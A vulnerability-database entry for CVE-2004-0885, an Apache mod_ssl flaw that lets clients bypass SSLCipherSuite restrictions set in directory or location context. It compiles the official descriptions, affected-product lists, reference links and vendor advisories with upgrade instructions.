CVE-2004-0885
CVSS 7.5
Published: 2004-11-03 00:00:00
Revised: 2016-10-17 22:49:42

[Original] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.


[CNNVD] Apache mod_ssl SSLCipherSuite directive restriction bypass vulnerability (CNNVD-200411-033)

        
        mod_ssl is the SSL implementation for the Apache server; it provides encryption support for the Apache web server.
        Under certain configurations Apache mod_ssl has a flaw that lets a remote attacker bypass the restrictions set by the SSLCipherSuite directive.
        When SSLCipherSuite is used in a directory or location context to restrict the cipher suites for that directory or location, a remote user can still reach the resources in the restricted directory or location using any cipher suite that the virtual host configuration allows.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]

- CPE (affected platforms and products)

cpe:/a:apache:http_server:2.0.35  Apache Software Foundation Apache HTTP Server 2.0.35
cpe:/a:apache:http_server:2.0.36  Apache Software Foundation Apache HTTP Server 2.0.36
cpe:/a:apache:http_server:2.0.37  Apache Software Foundation Apache HTTP Server 2.0.37
cpe:/a:apache:http_server:2.0.38  Apache Software Foundation Apache HTTP Server 2.0.38
cpe:/a:apache:http_server:2.0.39  Apache Software Foundation Apache HTTP Server 2.0.39
cpe:/a:apache:http_server:2.0.40  Apache Software Foundation Apache HTTP Server 2.0.40
cpe:/a:apache:http_server:2.0.41  Apache Software Foundation Apache HTTP Server 2.0.41
cpe:/a:apache:http_server:2.0.42  Apache Software Foundation Apache HTTP Server 2.0.42
cpe:/a:apache:http_server:2.0.43  Apache Software Foundation Apache HTTP Server 2.0.43
cpe:/a:apache:http_server:2.0.44  Apache Software Foundation Apache HTTP Server 2.0.44
cpe:/a:apache:http_server:2.0.45  Apache Software Foundation Apache HTTP Server 2.0.45
cpe:/a:apache:http_server:2.0.46  Apache Software Foundation Apache HTTP Server 2.0.46
cpe:/a:apache:http_server:2.0.47  Apache Software Foundation Apache HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.48  Apache Software Foundation Apache HTTP Server 2.0.48
cpe:/a:apache:http_server:2.0.49  Apache Software Foundation Apache HTTP Server 2.0.49
cpe:/a:apache:http_server:2.0.50  Apache Software Foundation Apache HTTP Server 2.0.50
cpe:/a:apache:http_server:2.0.51  Apache Software Foundation Apache HTTP Server 2.0.51
cpe:/a:apache:http_server:2.0.52  Apache Software Foundation Apache HTTP Server 2.0.52

- OVAL (technical details for detection)

oval:org.mitre.oval:def:10384  The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remot...
*The OVAL definition describes in detail how to detect this vulnerability; see the referenced OVAL definition for further technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0885
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0885
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-033
(official data source) CNNVD

- Other links and resources

http://issues.apache.org/bugzilla/show_bug.cgi?id=31505  (CONFIRM)
http://lists.apple.com/archives/security-announce/2005//Aug/msg00001.html  (APPLE APPLE-SA-2005-08-17)
http://lists.apple.com/archives/security-announce/2005/Aug/msg00000.html  (APPLE APPLE-SA-2005-08-15)
http://marc.info/?l=bugtraq&m=109786159119069&w=2  (BUGTRAQ 20041015 [OpenPKG-SA-2004.044] OpenPKG Security Advisory (modssl))
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1  (SUNALERT 102198)
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm  (CONFIRM)
http://www.apacheweek.com/features/security-20  (CONFIRM)
http://www.redhat.com/support/errata/RHSA-2004-562.html  (REDHAT RHSA-2004:562)
http://www.redhat.com/support/errata/RHSA-2004-600.html  (VENDOR_ADVISORY; REDHAT RHSA-2004:600)
http://www.redhat.com/support/errata/RHSA-2005-816.html  (REDHAT RHSA-2005:816)
http://www.redhat.com/support/errata/RHSA-2008-0261.html  (REDHAT RHSA-2008:0261)
http://www.securityfocus.com/bid/11360  (BID 11360)
http://www.ubuntu.com/usn/usn-177-1  (UBUNTU USN-177-1)
http://www.vupen.com/english/advisories/2006/0789  (VUPEN ADV-2006-0789)
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01123  (HP HPSBUX01123)
http://xforce.iss.net/xforce/xfdb/17671  (VENDOR_ADVISORY; XF apache-sslciphersuite-restriction-bypass(17671))

- Vulnerability information

Apache mod_ssl SSLCipherSuite directive restriction bypass vulnerability
High risk  Unknown
2004-11-03 00:00:00 2005-10-20 00:00:00
Remote / Local
        
        

- Advisories and patches

        Vendor patches:
        Apache
        ------
        The vendor has released an upgrade that fixes this issue. Download it from the vendor's home page and upgrade to Apache 2.0.53 (the fix first appeared in 2.0.53-dev):
        
        http://httpd.apache.org/

- Vulnerability information (F34810)

Gentoo Linux Security Advisory 200410-21 (PacketStormID:F34810)
2004-10-27 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2004-0885

Gentoo Linux Security Advisory GLSA 200410-21 - A flaw has been found in mod_ssl where the SSLCipherSuite directive could be bypassed in certain configurations if it is used in a directory or location context to restrict the set of allowed cipher suites.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200410-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: Apache 2, mod_ssl: Bypass of SSLCipherSuite directive
      Date: October 21, 2004
      Bugs: #66807
        ID: 200410-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

In certain configurations, it can be possible to bypass restrictions
set by the "SSLCipherSuite" directive of mod_ssl.

Background
==========

The Apache HTTP server is one of the most popular web servers on the
internet. mod_ssl provides SSL v2/v3 and TLS v1 support for Apache 1.3
and is also included in Apache 2.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  net-www/apache       < 2.0.52                           >= 2.0.52
                                                                 < 2.0
  2  net-www/mod_ssl      < 2.8.20                           >= 2.8.20
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

A flaw has been found in mod_ssl where the "SSLCipherSuite" directive
could be bypassed in certain configurations if it is used in a
directory or location context to restrict the set of allowed cipher
suites.

Impact
======

A remote attacker could gain access to a location using any cipher
suite allowed by the server/virtual host configuration, disregarding
the restrictions by "SSLCipherSuite" for that location.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Apache 2 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-www/apache-2.0.52"
    # emerge ">=net-www/apache-2.0.52"

All mod_ssl users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-www/mod_ssl-2.8.20"
    # emerge ">=net-www/mod_ssl-2.8.20"

References
==========

  [ 1 ] CAN-2004-0885
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0885
  [ 2 ] Apache HTTPD Bug 31505
        http://issues.apache.org/bugzilla/show_bug.cgi?id=31505

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-21.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0
    

- Vulnerability information (F34739)

mod_ssl-2.8.20-1.3.31.tar.gz (PacketStormID:F34739)
2004-10-26 00:00:00
 
encryption
CVE-2004-0885

mod_ssl provides strong cryptography for the Apache 1.3 webserver via the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1). It is based on the SSL/TLS toolkit OpenSSL and supports all SSL/TLS related functionality, including RSA and DSA/DH cipher support, X.509 CRL checking, etc. Additionally it provides special Apache related facilities like DBM and shared memory based inter-process SSL session caching, per-URL SSL session renegotiations, DSO support, etc.

- Vulnerability information

10637
Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity

- Vulnerability description

Apache mod_ssl contains a flaw that may allow a malicious user to bypass SSLCipherSuite access restrictions. The issue is triggered when the SSLCipherSuite directive is used in a directory context to require a restricted set of cipher suites. An attacker can use an alternate cipher suite, possibly allowing them to bypass access restrictions, resulting in a loss of confidentiality and/or integrity.

- Timeline

2004-10-11 Unknown
Unknown Unknown

- Solution

Upgrade to mod_ssl 2.8.20-1.3.31 (for Apache 1.3) or Apache 2.0.53 or higher, as these are reported to fix this vulnerability. An upgrade is required as there are no known workarounds.


- Vulnerability credit

Unknown or Incomplete

- Vulnerability information

Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
Class: Design Error
Bugtraq ID: 11360
Remote: Yes  Local: No
Published: 2004-10-11 12:00:00  Updated: 2008-06-30 11:52:00
Discovery of this issue is credited to Hartmut Keil.

- Affected program versions

VMWare ESX Server 2.1.2
VMWare ESX Server 2.1.1
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 2.0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Home
Sun Solaris 10.0_x86
Sun Solaris 10.0
Sun Solaris 10
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux 8.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
RedHat Stronghold 4.0
RedHat Network Satellite (for RHEL 4) 4.2
RedHat Network Proxy (for RHEL 3) 4.2
Red Hat Red Hat Network Satellite Server 5.0
Red Hat Network Satellite (for RHEL 3) 4.2
Red Hat Network Proxy (for RHEL 4) 4.2
mod_ssl mod_ssl 2.8.18
mod_ssl mod_ssl 2.8.17
mod_ssl mod_ssl 2.8.16
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
mod_ssl mod_ssl 2.8.15
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
mod_ssl mod_ssl 2.8.14
+ Slackware Linux 9.0
mod_ssl mod_ssl 2.8.12
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
mod_ssl mod_ssl 2.8.10
- Apache Software Foundation Apache 1.3.26
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Slackware Linux 8.1
mod_ssl mod_ssl 2.8.9
- Apache Software Foundation Apache 1.3.26
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ HP Secure OS software for Linux 1.0
+ Slackware Linux 8.1
mod_ssl mod_ssl 2.8.8
- Apache Software Foundation Apache 1.3.24
mod_ssl mod_ssl 2.8.7
+ Apache Software Foundation Apache 1.3.23
+ MandrakeSoft Multi Network Firewall 2.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
mod_ssl mod_ssl 2.8.6
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ Compaq Compaq Secure Web Server for OpenVMS 1.2
+ Compaq Compaq Secure Web Server for OpenVMS 1.1 -1
+ Compaq Compaq Secure Web Server for OpenVMS 1.0 -1
+ Compaq Compaq Secure Web Server for Tru64 5.5.2
mod_ssl mod_ssl 2.8.5 -2
- Apache Software Foundation Apache 1.3.22
mod_ssl mod_ssl 2.8.5 -1
mod_ssl mod_ssl 2.8.5
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
mod_ssl mod_ssl 2.8.4
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ MandrakeSoft Single Network Firewall 7.2
+ Slackware Linux 8.1
mod_ssl mod_ssl 2.8.3
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
mod_ssl mod_ssl 2.8.2
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
mod_ssl mod_ssl 2.8.1 -2
+ Apache Software Foundation Apache 1.3.19
mod_ssl mod_ssl 2.8.1
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ RedHat Secure Web Server 3.2 i386
mod_ssl mod_ssl 2.8
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.22
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.20
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.19
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.17
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.16
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.15
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14 Mac
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.14
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.13
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.12
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.11
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.9
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.7 -dev
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.6
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.4
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.3
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3.1
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.3
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2.5
+ Apache Software Foundation Apache 1.2
+ Apache Software Foundation Apache 1.2
IBM Hardware Management Console (HMC) for pSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for pSeries 3.3.2
IBM Hardware Management Console (HMC) for iSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for iSeries 3.3.2
HP HP-UX B.11.23
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
Conectiva Linux 10.0
Avaya Network Routing
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Avaya Communication Manager 2.0.1
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 2.0
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.3.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Apple Mac OS X Server 10.3.9
Apache Software Foundation Apache 2.0.52
+ Apple Mac OS X 10.3.6
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X Server 10.3.6
+ Apple Mac OS X Server 10.2.8
+ Red Hat Enterprise Linux AS 4
+ RedHat Desktop 4.0
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
+ Sun Solaris 10
Apache Software Foundation Apache 2.0.51
Apache Software Foundation Apache 2.0.50
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
Apache Software Foundation Apache 2.0.49
+ S.u.S.E. Linux Personal 9.1
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.48
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.47
+ Apple Mac OS X Server 10.3.5
+ Apple Mac OS X Server 10.3.4
+ Apple Mac OS X Server 10.3.3
+ Apple Mac OS X Server 10.3.2
+ Apple Mac OS X Server 10.3.1
+ Apple Mac OS X Server 10.3
+ Apple Mac OS X Server 10.2.8
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.1.5
+ Apple Mac OS X Server 10.1.4
+ Apple Mac OS X Server 10.1.3
+ Apple Mac OS X Server 10.1.2
+ Apple Mac OS X Server 10.1.1
+ Apple Mac OS X Server 10.1
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Apache Software Foundation Apache 2.0.46
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.45
- Apple Mac OS X 10.2.6
- Apple Mac OS X 10.2.5
- Apple Mac OS X 10.2.4
- Apple Mac OS X 10.2.3
- Apple Mac OS X 10.2.2
- Apple Mac OS X 10.2.1
- Apple Mac OS X 10.2
- Apple Mac OS X 10.1.5
- Apple Mac OS X 10.1.4
- Apple Mac OS X 10.1.3
- Apple Mac OS X 10.1.2
- Apple Mac OS X 10.1.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.0.4
- Apple Mac OS X 10.0.3
- Apple Mac OS X 10.0.2
- Apple Mac OS X 10.0.1
- Apple Mac OS X 10.0
+ Conectiva Linux 9.0
Apache Software Foundation Apache 2.0.44
Apache Software Foundation Apache 2.0.43
Apache Software Foundation Apache 2.0.42
Apache Software Foundation Apache 2.0.41
Apache Software Foundation Apache 2.0.40
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0
+ Terra Soft Solutions Yellow Dog Linux 3.0
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 2.0.38
Apache Software Foundation Apache 2.0.37
Apache Software Foundation Apache 2.0.36
Apache Software Foundation Apache 2.0.35

- Unaffected program versions

Apache Software Foundation Apache 2.0.53

- Vulnerability discussion

Apache 2.x mod_ssl is reported prone to a restriction-bypass vulnerability. This issue presents itself when mod_ssl is configured to be used with the 'SSLCipherSuite' directive in a 'Directory' or 'Location' context. Reportedly, this vulnerability allows a client to use any cipher suite allowed by the virtual host configuration regardless of cipher suites specified for a specific directory. This can allow an attacker to bypass security policies and use potentially weaker encryption types than allowed.

Apache 2.0.35 to 2.0.52 are reported vulnerable to this issue.
